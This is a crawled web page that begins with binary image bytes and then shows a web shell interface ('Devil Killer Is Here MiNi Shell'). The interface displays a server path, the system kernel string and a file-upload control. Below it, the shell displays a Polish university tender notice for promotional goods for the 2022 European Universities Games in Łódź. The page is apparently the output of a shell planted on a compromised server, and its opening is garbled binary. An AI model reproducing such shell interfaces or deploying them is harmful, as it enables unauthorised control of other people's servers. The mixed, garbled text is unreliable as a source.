JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220414/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220414/0012366801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów i artykułów reklamowych <br/>z nadrukiem na potrzeby Europejskich Igrzysk Akademickich w Łodzi w 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 7270021895</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 116</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-924</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 42/631 21 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.dzialsportu@info.p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zp.p.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów i artykułów reklamowych <br/>z nadrukiem na potrzeby Europejskich Igrzysk Akademickich w Łodzi w 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c80c4337-bc13-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00123668</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028942/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.11 Artykuły informacyjne i promocyjne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://plodz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://plodz.ezamawiajacy.pl/<br/>w zakładce „Korespondencja”.<br/>2.W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu Platformy. Datą złożenia<br/>dokumentu, oświadczenia lub innego rodzaju informacji stanowiących przedmiot korespondencji (w tym wyjaśnień, wezwania,<br/>uzupełnienia, etc.) jest data ich złożenia/wysłania za pośrednictwem zakładki „Korespondencja”.<br/>Zamawiający nie będzie udzielał odpowiedzi na pytania do SWZ lub rozpatrywał wniosków dotyczących czynności podejmowanych<br/>w postępowaniu lub innych pism Wykonawców, jeżeli wnioski te lub pisma zostaną złożone w inny sposób niż za pośrednictwem<br/>Platformy (np. poprzez adres e-mail).<br/>3.Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Politechniki Łódzkiej:<br/>https://plodz.ezamawiajacy.pl/servlet/HomeServlet<br/>lub<br/>https://oneplace.marketplanet.pl<br/>4.Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego.<br/>5.Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zam. zaleca Wykonawcom uwzględnienie czasu<br/>niezbędnego na rejestracje w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia<br/>wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować<br/>się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>6.Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>7.Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>8.Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0. Zalecane przeglądarki internetowe to Mozilla FireFox lub<br/>Google Chrome;<br/>4) Włączona obsługa JavaScript. Wymagane wersje oprogramowania to Java 32 bit<br/>oraz Java 64 bit w wersji 8U202;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików<br/>o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav,<br/>mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig,<br/>XAdES, CAdES, ASIC, XMLenc.<br/>10.Sposób sporządzania i przekazywania dokumentów określony został w ROZPORZĄDZENIU PREZESA RADY MINISTRÓW z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Szczegóły zawiera Rozdział XI SWZ.<br/>11. Oferta musi być sporządzona pod rygorem nieważności, w języku polskim, w postaci elektronicznej, i opatrzona kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu) przez osobę upoważnioną do<br/>reprezentowania Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem danych osobowych jest Politechnika Łódzka, ul. Stefana Żeromskiego 116, 90-924<br/>Łódź,<br/>2) inspektor ochrony danych osobowych w Politechnice Łódzkiej kontakt: rbi@adm.p.lodz.pl telefon: 42 631 20 39 (Wyjaśnienie:<br/>informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego<br/>administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony<br/>danych osobowych), (...) ciąg dalszy w Rozdziale XX SWZ pkt 1. 3) i następne.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja zawarta w Rozdziale XX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RRS.383.7.2022.D.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa materiałów i artykułów reklamowych i promocyjnych, które zostaną wykonane jako wolne od wad fizycznych i prawnych, fabrycznie nowe, tj. nieużywane, nieuszkodzone, nieregenerowane, nieprefabrykowane, nieobciążone prawami osób lub podmiotów trzecich oraz muszą pochodzić z legalnego kanału sprzedaży producenta.<br/>Z uwagi na reprezentacyjny charakter i przeznaczenie materiały muszą być bardzo dobrej jakości, charakteryzować się dużą estetyką i starannością wykonania. Materiały reklamowe powinny być dostarczone gotowe do użytku bez żadnych dodatkowych zakupów oraz winny spełniać warunki określone dla produktów bezpiecznych w rozumieniu art. 4 ust. 1 ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów. Zamawiający wymaga, aby materiały reklamowe były wyprodukowane zgodne z obowiązującymi przepisami prawa. Dostarczone materiały muszą posiadać deklarację zgodności CE. <br/> Szczegółowe wymagania Zamawiającego dotyczące wykonania przedmiotu zamówienia zawiera Formularz cenowy - stanowiący Załącznik nr 2 do SWZ,<br/> Opis Przedmiotu Zamówienia, stanowiący Załącznik nr 9 do SWZ (dalej jako „OPZ”) oraz projektowane postanowienia umowy stanowiące załącznik nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39294100-0 - Artykuły informacyjne i promocyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22462000-6 - Materiały reklamowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> [Numeracja zgodna z Rozdziałem VII SWZ] <br/>2. Informacje o warunkach udziału w postępowaniu o udzielenie zamówienia:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki udziału w postępowaniu:<br/>2.1. zdolności do występowania w obrocie gospodarczym<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/> o ile wynika to z odrębnych przepisów<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.3. sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.4. zdolności technicznej lub zawodowej:<br/>2.4.1. Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada wiedzę i doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy to w tym okresie wykonał (zakończył) należycie 3 zamówienia każde polegające na dostawie materiałów reklamowych i/lub promocyjnych co najmniej o wartości 100 000,00 PLN brutto każde.<br/>2.4.2. Dodatkowe wymagania dotyczące warunku, określonego w pkt 2.4.1.SWZ. <br/>1) Przez definicję zamówienia, Zamawiający rozumie jedną umowę odpłatną zawartą między Zamawiającym a Wykonawcą, której przedmiotem były dostawy.<br/>2)	W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>3)	Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa w pkt 3.2. Rozdziału VIII SWZ, dotyczy dostaw, które Wykonawca ten bezpośrednio wykonał. <br/>4)	W przypadku gdy ofertę w niniejszym postępowaniu składa konsorcjum/spółka cywilna <br/>w takim samym składzie podmiotowym (lub szerszym) w jakim realizowali wykazywaną dostaw, Zamawiający nie będzie badał zakresu dostaw wykonanych przez poszczególnych wykonawców.<br/>5)	a) Ocena spełniania warunku, o którym mowa powyżej, w stosunku do Wykonawcy, który powołuje się na doświadczenie grupy wykonawców, której był członkiem (tj. realizował zamówienie jako jeden z wykonawców wspólnych/członków konsorcjum) zostanie dokonana na podstawie udziału danego Wykonawcy w realizacji tego zamówienia, na które powołuje się w celu spełnienia warunku udziału w postępowaniu, tj. Wykonawca ten może powołać się na doświadczenie grupy wykonawców, której był członkiem pod warunkiem, że faktycznie i konkretnie uczestniczył w realizacji wykazanej części zamówienia.<br/>b)	Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>c) Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/ umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) Zamawiający nie dopuszcza, by Wykonawca polegał na doświadczeniu grupy wykonawców której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. <br/>d) Ocena spełniania warunku, o którym mowa powyżej, w stosunku do Wykonawcy, który powołuje się na doświadczenie grupy wykonawców, której członkiem był podmiot trzeci na zasobach którego polega wykonawca - poleganie na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 Ustawy Pzp - zostanie dokonana na podstawie udziału podmiotu trzeciego w realizacji tego zamówienia. <br/>6)	Wykonawca może powołać się na doświadczenie grupy wykonawców, której członkiem był podmiot udostępniający zasobu pod warunkiem, że podmiot ten faktycznie i konkretnie uczestniczył w realizacji wykazanej części zamówienia. Do oceny spełnienia warunku stosuje się lit. b).<br/>7)	Jeżeli Wykonawca wykonał zamówienie, którego elementem/częścią było wykonanie zakresu określonego w w/w warunku, Wykonawca na etapie potwierdzania spełniania warunków udziału w postępowaniu winien przedstawić ten fakt w Formularzu zawierającym wykaz dostaw wykonanych, poprzez wyodrębnienie rzeczowe i podanie zakresu, oraz wartości i przedmiotu dostaw, zgodnych z zakresem określonym w pkt 2.4.1. SWZ powyżej. <br/>8)Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania dostaw bezpośrednio u podmiotu, na rzecz którego były wykonane. <br/>9)	W przypadku wykazywania warunku określonego powyżej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (zgodnie z art. 117 ust. 1 Ustawy Pzp, np. konsorcjum, spółka cywilna), a także w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118 Ustawy Pzp, Zamawiający dopuszcza łączne spełnienie warunku.<br/>10)Ocena spełnienia przez Wykonawcę warunku, o których mowa w niniejszym rozdziale specyfikacji, nastąpi na podstawie przedłożonych oświadczeń i dokumentów, których wykaz został określony w Rozdziale VIII SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału <br/> w postępowaniu, Wykonawca w odpowiedzi na wezwanie do złożenia składa:<br/>1.1. Zamawiający, zgodnie z § 3 rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt 1, 2 lub 4-6, ww. rozporządzenia żąda<br/> - oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp, w zakresie podstaw wykluczenia z postępowania określonych w pkt 3.1. i 3.2. Rozdziału VII SWZ- zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ. <br/>1.2. W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp składa każdy z tych Wykonawców (dotyczy członków konsorcjum oraz wspólników spółki cywilnej) - zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ.<br/>1.3. Poleganie na zdolnościach lub sytuacji podmiotów udostępniających zasoby, na zasadach określonych w art. 118 Ustawy Pzp.<br/> Wykonawca, w przypadku polegania na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, składa podmiotowy środek dowodowy, aktualny na dzień złożenia:<br/> - Oświadczenie Podmiotu udostępniającego swoje zasoby o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 5 Ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w SWZ - zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ– jeśli dotyczy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących dokumentów, które w odpowiedzi na wezwanie do złożenia składa Wykonawca:<br/>1. wykazu dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie - wg. wykazu dostaw wykonanych wg. wzoru stanowiącego załącznik nr 8 do SWZ.<br/>2.dowodów, o których mowa w pkt .1. SWZ powyżej. Dowodami są:<br/> a) referencje bądź<br/> b) inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane,<br/> c) oświadczenie Wykonawcy - jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych 